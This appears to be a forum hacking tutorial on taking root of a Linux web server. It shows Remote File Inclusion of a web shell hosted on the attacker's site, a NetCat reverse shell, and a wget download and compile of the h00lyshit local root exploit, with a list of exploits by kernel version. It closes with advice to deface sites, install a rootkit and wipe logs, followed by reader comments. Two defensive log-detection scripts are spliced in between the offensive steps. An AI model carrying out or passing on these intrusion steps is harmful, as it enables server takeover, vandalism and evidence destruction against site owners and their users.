You will need:
Quote:
- Vulnerable site with R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)
The aim of this tutorial is to give a very general description of the process of rooting a Linux server with Safe Mode: OFF. Suppose that we have found a website with an RFI vulnerability:
Code:
http://www.hackedsite.com/folder/index.html?page=
We can run a shell by exploiting the Remote File Inclusion, as follows:
Code:
http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?
where evilscript.txt is our web shell that we have already uploaded to our site (www.mysite.com, in the folder: shells).
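From the defender's side, the request above shows up in the web server access log as a query parameter whose value is a URL on another host. The following scanner is an added example, not part of the original tutorial: it flags such requests over constructed combined-format log lines (IPs, timestamps and user agents are made up) and also catches the double-URL-encoded variant.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed combined-format access log lines (not real traffic)
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /folder/index.html?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /folder/index.html?page=http://www.mysite.com/shells/evilscript.txt? HTTP/1.1" 200 8123 "-" "curl/7.68.0"
203.0.113.9 - - [10/Oct/2023:13:56:05 +0000] "GET /folder/index.html?page=%2568ttp%253A%252F%252Fwww.mysite.com%252Fshells%252Fevilscript.txt HTTP/1.1" 200 8123 "-" "curl/7.68.0"
198.51.100.4 - - [10/Oct/2023:13:57:12 +0000] "GET /folder/index.html?page=contact HTTP/1.1" 200 430 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_SCHEMES = ("http", "https", "ftp")

def remote_url_params(path):
    """Return [(param, decoded value)] for query parameters that hold a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; this catches double encoding
        try:
            parts = urlsplit(decoded)
        except ValueError:        # malformed value (e.g. broken IPv6 literal)
            continue
        if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
            hits.append((name, decoded))
    return hits

def scan_log(text):
    """Return one finding per request whose query string carries a remote URL."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hits = remote_url_params(m.group("path"))
        if hits:
            findings.append({"ip": m.group("ip"), "status": m.group("status"), "params": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} status={f['status']} remote include attempt via {f['params']}")
```

A status of 200 on a flagged request is the case worth investigating first, since it means the application may actually have fetched and executed the remote file.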
After we get access to the shell, first of all we look at the version of the kernel, either at the top of the page or by typing: uname -a in the command line.
To continue we have to connect to the box with a back-connection. This can be done in two ways if we have a suitable shell:
We can use the Back-Connect module of the r57/c99 shell, or upload a back-connector into a writable folder.
Most shells have a back-connection feature, so there is no need to upload a separate Connect Back shell (or another shell in perl/c). We will look at the first way, which is built into the shell (in our example the shell is r57).
Initially we open NetCat and tell it to listen on a specific port (this port has to be properly opened/forwarded in the NAT/Firewall if we have a router) in the following way:
We will type 11457 in the port input (this is the default port for the latest versions of the r57 shell). We can also use another port.
We press in Windows Start -> Run -> and we type: cmd
Then we go to the NetCat directory:
Quote:
cd C:\Program Files\Netcat
And we type the following command:
Quote:
nc -n -l -v -p 11456
NetCat respond: listening on [any] 11456 …
In the main page of the r57 shell we find, under the menu ::: Net:: , the back-connect option. In the IP form we type our IP (www.cmyip.com shows our IP if we have a dynamic one).
In the Port form we put the port that we opened and that NetCat listens on.
If we press connect the shell will respond:
Now script try connect to port 11456 …
If our settings are correct NetCat will give us a shell on the server.
Now we will continue to the rooting process.
We have to find a writable folder in order to download and compile the Local Root Exploit that will give us root privileges on the box. Depending on the version of the Linux kernel there are different exploits. Sometimes the exploits fail to run because some boxes are patched or we don't have the right permissions. List of the exploits per kernel:
Quote:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
We will look at the case of the 2.6.8 Linux kernel. We will need the h00lyshit exploit.
Some sites where we can find Local Root Exploits:
milw0rm (try searching: "linux kernel")
Other sites: www.packetstormsecurity.org | www.milw0rm.com, or try Googling; you can find 'em all.
We can find writable folders/files by typing:
Code:
find / -perm -2 -ls
We can use the /tmp folder, which is a standard writable folder.
We type:
Code:
cd /tmp
To download the local root exploit we can use a download command for Linux such as wget.
For example:
Quote:
wget http://www.yoursite.com/localroot/h00lyshit.c
where http://www.yoursite.com/localroot/h00lyshit.c is the url of h00lyshit.
After the download we have to compile the exploit (read the instructions of the exploit before compiling).
For h00lyshit we have to type:
Code:
gcc h00lyshit.c -o h00lyshit
Now we have created the executable file: h00lyshit.
The command to run this exploit is:
Code:
./h00lyshit
We need a very big file on the disk in order for it to run successfully and give us root.
We have to create a big file in /tmp or in another writable folder.
The command is:
Code:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
We have to wait 2-3 minutes for the file creation.
If this command fails we can try:
Code:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can proceed to the last step. We run the exploit by typing:
Code:
./h00lyshit largefile
or
./h00lyshit /tmp/largefile
(if we are in a different writable folder and largefile was created in /tmp)
If there are no runtime errors (otherwise maybe the kernel is patched, or something is wrong with the exploit run or the large file) we will get root.
To check if we got root we type:
id
or
whoami
If it says root, we got root!
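On the server side, the sequence just described (a download into /tmp, a gcc run there, then execution of the result by the web-server account) is a recognisable pattern in process-execution logs. The following added example, not part of the original tutorial, correlates constructed execve-style events per account and reports when a web-server account downloads, compiles and executes a binary from a world-writable directory within a time window (the event format, account names and timestamps are assumptions made for the example).

```python
import os
import shlex
from datetime import datetime, timedelta
# Constructed sample events "timestamp|user|cwd|command line" (not real auditd output)
SAMPLE_EVENTS = """\
2023-10-10T14:01:02|www-data|/var/www|uname -a
2023-10-10T14:01:40|www-data|/tmp|wget http://www.yoursite.com/localroot/h00lyshit.c
2023-10-10T14:02:05|www-data|/tmp|gcc h00lyshit.c -o h00lyshit
2023-10-10T14:02:30|www-data|/tmp|dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
2023-10-10T14:05:10|www-data|/tmp|./h00lyshit /tmp/largefile
2023-10-10T14:06:00|alice|/home/alice|gcc hello.c -o hello
"""
WEB_USERS = {"www-data", "apache", "nobody", "httpd"}  # accounts a web shell runs as
WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")
DOWNLOADERS = {"wget", "curl", "fetch"}
COMPILERS = {"gcc", "cc", "clang", "tcc"}

def stage_of(cwd, argv):
    """Map one command to a chain stage (recon/download/compile/execute) or None."""
    prog = os.path.basename(argv[0])
    if prog == "uname":
        return "recon"
    if prog in DOWNLOADERS:
        return "download"
    if prog in COMPILERS:
        return "compile"
    if "/" in argv[0]:  # explicit path: is the binary inside a world-writable dir?
        target = os.path.normpath(os.path.join(cwd, argv[0]))
        if target.startswith(WORLD_WRITABLE):
            return "execute"
    return None

def detect_chain(text, window=timedelta(minutes=15)):
    """Return (user, stages, first_ts, last_ts) for each completed chain."""
    history = {}  # user -> [(ts, stage)] seen within the window
    findings = []
    for line in text.splitlines():
        ts_s, user, cwd, cmd = line.split("|", 3)
        if user not in WEB_USERS:
            continue
        ts = datetime.fromisoformat(ts_s)
        stage = stage_of(cwd, shlex.split(cmd))
        if stage is None:
            continue
        hist = [e for e in history.get(user, []) if ts - e[0] <= window] + [(ts, stage)]
        history[user] = hist
        stages = [s for _, s in hist]
        if stage == "execute" and "download" in stages and "compile" in stages:
            findings.append((user, stages, hist[0][0], ts))
    return findings
```

Mounting /tmp with noexec and removing compilers from web hosts breaks this chain outright; the detector is for the hosts where that is not yet done.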
Now we can deface/mass deface all the sites on the server, or set up a rootkit (e.g. SSHDoor) and take ssh/telnet shell access to the server.
We have to remove all logs in order to be safe, using a log cleaner. A good cleaner for this job is the MIG Log Cleaner.
Too bad it's in English,, this tutorial is good, just make an Indonesian version so the Indonesian kids get even more hyped
Is there an INDONESIAN version, bro
I'd like to request the Indonesian one please
There's a translate option on the left, pick the Indonesia image if you want to read this tutorial in Indonesian